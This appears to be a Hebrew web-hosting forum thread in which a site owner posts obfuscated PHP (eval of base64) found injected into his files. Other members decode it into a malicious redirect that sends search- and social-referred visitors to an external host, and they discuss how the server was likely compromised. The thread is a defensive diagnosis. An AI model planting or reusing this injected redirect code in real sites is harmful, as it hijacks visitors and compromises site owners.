קוד זנודי ומוצפן ש"ושתל" ב2 קבצים בשרת שלי. - הוסטס

Shlomi062 · 20-04-13, 20:15

אהלן,
קיבלתי פנייה מבעל השרת ש2 קבצים אצלי באתר מסויים מכילים וירוס, יש לציין שלא שיניתי כבר למעלה משנה את קבצים אלו.

נכנסתילקבצים ולהפתעתי מצאתי קוד מוצפן, שפשוט הושתל בדף, הנה הקוד:

PHP קוד:


			
             eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iYWdmcm8uZmFydGl0LmNvbS8iKTsKZXhpdCgpOw0KfQp9DQp9DQp9DQp9"));

מישהו יודע איך זה נגרם? האם המחשב שלי מודבק בוירוס? בעיה בשרת?

אשמח לתמיכה..

תודה!

אביב · 20-04-13, 21:06

קוד לאחר פיצוח ההצפנה:

PHP קוד:


			
error_reporting(0);

$qazplm=headers_sent();

if (!$qazplm){

$referer=$_SERVER['HTTP_REFERER'];

$uag=$_SERVER['HTTP_USER_AGENT'];

if ($uag) {

if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){

if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {

if (!stristr($referer,"cache") or !stristr($referer,"inurl")){

header("Location: http://bagfro.fartit.com/");

exit();

}

}

}

}

}

http://labs.sucuri.net/?details=bagfro.fartit.com

BuildDream · 20-04-13, 21:08

PHP קוד:


			
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://bagfro.fartit.com/");
exit();
}
}
}
}
}

כנראה שפרצו לך לשרת ושתלו את זה, הקוד הזה סה"כ עושה הפנייה לכתובת של Dynamic DNS שלך תדע מה הם רוצים לעשות עם מי שנכנס אליהם. אני אישית מקבל Access Forbidden.

מי שמחביא ככה קוד לא עושה עבודה טובה במיוחד, יכול להיות גם שזה בוט אוטומטי שפרץ לך דרך חולשה מוכרת באיזה מערכת מוכנה שיושבת לך על השרת או משהו...

Shlomi062 · 20-04-13, 22:33

תודה חבר'ה!

אדיר · 20-04-13, 22:36

סביר להניח שבעל השרת הוא היחיד שיוכל לבדוק איך ומתי השינויים הללו נעשו, ככה שהייתי מחזיר את השאלה חזרה אליו.

Rhost · 20-04-13, 22:39

שאלה: איך הצלחת מהקוד המוצפן לעבור לקוד המקורי ?

אדיר · 20-04-13, 22:47

ציטוט:

נכתב במקור על ידי Rhost

שאלה: איך הצלחת מהקוד המוצפן לעבור לקוד המקורי ?

אין כאן שום הצפנה, זה טקסט המקודד ב- base64 (חפש בגוגל base64 decode ושים באחד הכלים את המחרוזת הזו).

Rhost · 21-04-13, 09:22

אחלה תודה על אינפורמציה

Shlomi062 · 21-04-13, 14:21

אדיר, תודה.

20-04-13, 20:15	# 1
Shlomi062 חבר על מיני פרופיל תאריך הצטרפות: Dec 2010 מיקום: מרכז הודעות: 913	קוד זנודי ומוצפן ש"ושתל" ב2 קבצים בשרת שלי. אהלן, קיבלתי פנייה מבעל השרת ש2 קבצים אצלי באתר מסויים מכילים וירוס, יש לציין שלא שיניתי כבר למעלה משנה את קבצים אלו. נכנסתילקבצים ולהפתעתי מצאתי קוד מוצפן, שפשוט הושתל בדף, הנה הקוד: PHP קוד: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9iYWdmcm8uZmFydGl0LmNvbS8iKTsKZXhpdCgpOw0KfQp9DQp9DQp9DQp9")); מישהו יודע איך זה נגרם? האם המחשב שלי מודבק בוירוס? בעיה בשרת? אשמח לתמיכה.. תודה! __________________ SDesigner.co.il - עיצוב ובניית אתרים ופורומים מבוססי phpBB, מוזמנים להיכנס לאתר החדש VerySimple.co.il - בניית מערכות CMS בהתאמה אישית. מחפשים אחסון אתרים אמין וזול?

20-04-13, 21:06	# 2
אביב עסק רשום [?] מיני פרופיל תאריך הצטרפות: Aug 2011 הודעות: 250	קוד לאחר פיצוח ההצפנה: PHP קוד: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.?)\&lr\=/",$referer) or preg_match ("/google\.(.?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://bagfro.fartit.com/"); exit(); } } } } } http://labs.sucuri.net/?details=bagfro.fartit.com __________________ חצור אתרים LinkedIn \| Gmail \| Website

20-04-13, 21:08	# 3
BuildDream עסק רשום [?] מיני פרופיל תאריך הצטרפות: Oct 2010 הודעות: 527	PHP קוד: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){ if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.?)\&lr\=/",$referer) or preg_match ("/google\.(.?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://bagfro.fartit.com/"); exit(); } } } } } כנראה שפרצו לך לשרת ושתלו את זה, הקוד הזה סה"כ עושה הפנייה לכתובת של Dynamic DNS שלך תדע מה הם רוצים לעשות עם מי שנכנס אליהם. אני אישית מקבל Access Forbidden. מי שמחביא ככה קוד לא עושה עבודה טובה במיוחד, יכול להיות גם שזה בוט אוטומטי שפרץ לך דרך חולשה מוכרת באיזה מערכת מוכנה שיושבת לך על השרת או משהו... __________________ BuildDream בניית אתרי אינטרנט לשירותך. עסק רשום במס הכנסה ומספק קבלות כחוק. www.BuildDream.co.il - www.iBuild.co.il

20-04-13, 22:33	# 4
Shlomi062 חבר על מיני פרופיל תאריך הצטרפות: Dec 2010 מיקום: מרכז הודעות: 913	תודה חבר'ה! __________________ SDesigner.co.il - עיצוב ובניית אתרים ופורומים מבוססי phpBB, מוזמנים להיכנס לאתר החדש VerySimple.co.il - בניית מערכות CMS בהתאמה אישית. מחפשים אחסון אתרים אמין וזול?

20-04-13, 22:36	# 5
אדיר עסק רשום [?] מיני פרופיל תאריך הצטרפות: Mar 2008 מיקום: אשקלון הודעות: 1,714	סביר להניח שבעל השרת הוא היחיד שיוכל לבדוק איך ומתי השינויים הללו נעשו, ככה שהייתי מחזיר את השאלה חזרה אליו. __________________ LinkedIn \| אני, אדיר \| העלאת תמונות


	ההרשמה לפורום נפתחה - אפשרות רישום לכל אימייל (דומיינים פרטיים, gmail, הוטמייל..)!

20-04-13, 22:39	# 6
Rhost עסק רשום [?] מיני פרופיל תאריך הצטרפות: Jun 2011 מיקום: הוד השרון הודעות: 571	שאלה: איך הצלחת מהקוד המוצפן לעבור לקוד המקורי ? __________________ Global Net Access \| www.Rhost.biz \| Europe & USA Data Centers Domains \| Certificates \| Web Hosting \| VPS \| Enterprise Solutions

21-04-13, 09:22	# 8
Rhost עסק רשום [?] מיני פרופיל תאריך הצטרפות: Jun 2011 מיקום: הוד השרון הודעות: 571	אחלה תודה על אינפורמציה __________________ Global Net Access \| www.Rhost.biz \| Europe & USA Data Centers Domains \| Certificates \| Web Hosting \| VPS \| Enterprise Solutions

21-04-13, 14:21	# 9
Shlomi062 חבר על מיני פרופיל תאריך הצטרפות: Dec 2010 מיקום: מרכז הודעות: 913	אדיר, תודה. __________________ SDesigner.co.il - עיצוב ובניית אתרים ופורומים מבוססי phpBB, מוזמנים להיכנס לאתר החדש VerySimple.co.il - בניית מערכות CMS בהתאמה אישית. מחפשים אחסון אתרים אמין וזול?

חברים פעילים הצופים באשכול זה: 1 (0 חברים ו- 1 אורחים)